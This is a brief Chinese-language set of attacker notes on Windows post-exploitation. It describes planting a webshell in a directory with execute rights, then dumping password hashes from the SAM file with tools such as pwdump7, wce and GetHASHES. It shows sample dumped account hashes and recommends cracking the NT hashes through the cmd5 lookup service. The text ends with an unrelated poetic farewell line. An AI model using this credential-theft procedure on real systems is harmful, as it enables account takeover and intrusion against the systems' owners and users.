webshell 找能執行權限的目錄上傳
C:\Windows\System32\config\sam 内有windows 密碼 利用工具把密碼抓出來
samcopy 直接抓取
GetHASHES.exe $Local 傳回目前系統所有的使用者的哈希
pwdump7.exe 自動抓取哈希 都是用cmd 執行 來賓和system 一般都沒有密碼
wce.exe 自動抓哈希
Saminside 字典破解
破解sam密碼
我一般用pwdump7 執行後傳回
Administrator:500:7B59ACC609CD473AF50785CA52198E4D:92748A4523592194AF8963A1949FCA0B:::
Guest:501:64C3E77603C7A3BF5A5E17C210A88A96:30CFBECB0A6FD6BADBAB21A275788798:::
:503:4F07A12B796A954B583F6D0501D59953:A0D5FADC55DA895E937A93ED39669D76:::
:504:9D8835529B6E728C4CEE482ECCDDD9CE:0A51EEE494AB8F940DB69BC2FCA4E648:::
test:1001:F5942A1378FEC39E6ACBF03ADAEE3EB1:8DFE55D2D16AA9E2DA4F44412E897201:::
密碼格式為
nt-hash 直接丢到cmd5裡解密 可以得到密碼
從此山高路遠,縱馬揚鞭。願往後旅途,三冬暖,春不寒,天黑有燈,下雨有傘。此生盡興,不負勇往。